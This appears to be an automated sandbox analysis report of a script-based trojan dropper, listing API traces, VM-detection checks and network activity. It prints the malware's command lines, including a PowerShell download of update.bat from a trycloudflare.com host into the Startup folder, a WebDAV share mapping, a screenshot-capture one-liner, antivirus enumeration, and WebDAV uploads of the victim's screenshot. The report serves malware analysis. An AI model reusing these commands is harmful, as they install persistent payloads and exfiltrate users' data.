CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0072e090 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3250 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3950 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 4, 2025, 12:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002d3010 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 4, 2025, 12:45 p.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat

Performs some HTTP requests (20 events)

request	PROPFIND https://minutes-amazing-curriculum-maui.trycloudflare.com/AutoRun.inf
request	PROPFIND https://lu-phys-peru-goes.trycloudflare.com/AutoRun.inf
request	PROPFIND https://lu-phys-peru-goes.trycloudflare.com/
request	MKCOL https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65
request	PROPPATCH https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65
request	PROPFIND https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65.txt
request	PUT https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65.txt
request	LOCK https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65.txt
request	PROPPATCH https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65.txt
request	HEAD https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65.txt
request	UNLOCK https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65.txt
request	PROPFIND https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65_screenshot.png
request	PUT https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65_screenshot.png
request	LOCK https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65_screenshot.png
request	PROPPATCH https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65_screenshot.png
request	HEAD https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65_screenshot.png
request	UNLOCK https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/test22-PC_2025-05-04_20_46_07_65_screenshot.png
request	PROPFIND https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65/update.bat
request	GET https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat
request	PROPFIND https://lu-phys-peru-goes.trycloudflare.com/test22-PC_2025-05-04_20_46_07_65

Allocates read-write-execute memory (usually to unpack itself) (50 out of 902 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72641000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72642000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02781000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02782000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02523000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02524000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02860000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02526000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 2856 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (15 events)

cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot"
cmdline	powershell -Command "(New-Object Net.WebClient).DownloadFile('https://minutes-amazing-curriculum-maui.trycloudflare.com/update.bat', 'C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat')"
cmdline	powershell -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $screen = [System.Windows.Forms.Screen]::PrimaryScreen; $bmp = New-Object Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height; $g = [System.Drawing.Graphics]::FromImage($bmp); $g.CopyFromScreen($screen.Bounds.Location, [System.Drawing.Point]::Empty, $screen.Bounds.Size); $bmp.Save('C:\Users\test22\AppData\Local\Temp\test22-PC_screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
cmdline	"C:\Windows\System32\cmd.exe" /c net use Z: /delete /y
cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat"
cmdline	powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\de.bat"
cmdline	powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat\" hidden' -WindowStyle Hidden"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct \| Select-Object -ExpandProperty displayName" 2>nul
cmdline	C:\Windows\System32\cmd.exe /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" hidden
cmdline	powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat' -ArgumentList 'hidden' -WindowStyle Hidden"
cmdline	C:\Windows\system32\cmd.exe /c powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" hidden
cmdline	powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct \| Select-Object -ExpandProperty displayName"

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: cmd parameters: /c net use Z: /delete /y filepath: cmd	1	1
ShellExecuteExW May 4, 2025, 12:45 p.m.	show_type: 0 filepath_r: cmd parameters: /c net use Z: "\\minutes-amazing-curriculum-maui.trycloudflare.com@SSL\DavWWWRoot" filepath: cmd	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat" filepath: cmd	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" filepath: cmd	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\batchcache\de.bat" filepath: cmd	1	1
CreateProcessInternalW May 4, 2025, 12:46 p.m.	thread_identifier: 2860 thread_handle: 0x00000088 process_identifier: 2856 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat' -ArgumentList 'hidden' -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat parameters: hidden filepath: C:\Users\test22\AppData\Local\Temp\batchcache\curl.bat	1	1
CreateProcessInternalW May 4, 2025, 12:46 p.m.	thread_identifier: 2804 thread_handle: 0x00000088 process_identifier: 2812 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat\" hidden' -WindowStyle Hidden" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
ShellExecuteExW May 4, 2025, 12:46 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c "C:\Users\test22\AppData\Local\Temp\batchcache\tre.bat" hidden filepath: C:\Windows\System32\cmd.exe	1	1

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Skyhigh	BehavesLike.VBS.Dropper.zv
Kaspersky	HEUR:Trojan.Script.Generic

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory May 4, 2025, 12:46 p.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05230000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 4, 2025, 12:45 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (18 events)

Data received	[
Data received	Whét^ÆÞ¸JÛé]=9ÁFºDOWNGRD #ßX-éÞ2©ôqaÒ,.ä XµÏ×¸Àÿ
Data received	Ë
Data received	ÇÄF0B0* /í7o úl q«Ï0 H÷ 0;10 UUS10U Google Trust Services10 UWR10 250422165136Z 250721174959Z010Utrycloudflare.com0"0 H÷ 0 »oçUkªÎª9ÒhäYMoM"ÃÑ³;=ÃG¼ãÇJPiçåÀ(°[ïDü2¢ÁxÚòß§cÐñÒ 7"7µbíZ()mûâæö ÁÍØX¶+çójØÜùj^´qÞWe^GHg;°ÒìcÞýa%pM³ê ÁSñÿQç¿DoMm¸Ã¹¹Uîä0Éf µÒÕÕXkPtr}kV¡¶ØÔÁ£ËD¸X}ëùU&·"»<Éóp7ôfä±0ÊöJÙ5¬¢/ec@xVR¹QG®sÁ^ÞhPl¦Îë£_0[0Uÿ 0U%0 +0Uÿ00Uï9þâ¾òf{JVÄ7{0U#0fiIÔÞÏ$¸0n.0^+R0P0'+0http://o.pki.goog/s/wr1/L5I0%+0http://i.pki.goog/wr1.crt01U0(trycloudflare.com.trycloudflare.com0U 0 0g06U/0-0+ ) '%http://c.pki.goog/wr1/Cj_AnkL3zwk.crl0 +Öyõòðw}Yáx{ag\|^ýøÐ\ N¹/Ù.y¸^ xÂH0F!ãþlÍ:s1L±ðâ'K7ûµÐ}¯£ÁHkHû÷!µQpNÃÉd×;w Ð Íph9þw7é[uÝÜÊ4×áç2úÇø=PßÛ:v ,¬»È^ xÐF0D ÈIå&\|Ã:LsE6ï¿ofÔÅMã ß¼I $ó22äAZ¶W1 ·4á²¦O ª.jî0 H÷ jÏÞì§D¦°J¨Tñ Æ~\|±ª~kj§Vt½õavuöí¦×®fø&sÙõhÆ·ÄõCqºæ!èÁÆR½4a0S»ê3ÍågfGÂ:øv5VvóÖÈgw+7éó¾)î¬!Wt-xæ?âózU ~l!¬/#õé 1&=<¾Ê¡ËÒæ³±oSrá¸!Q=ß?Ã5®pì ¨ýÌ^ºÝHlÎª¯UØ6GBâ°îýËÌTõ){µj£çó½¬@èG1ufØq¶00ó ÙâÂÒt¶'¢mh§0 H÷ 0G10 UUS1"0 U Google Trust Services LLC10UGTS Root R10 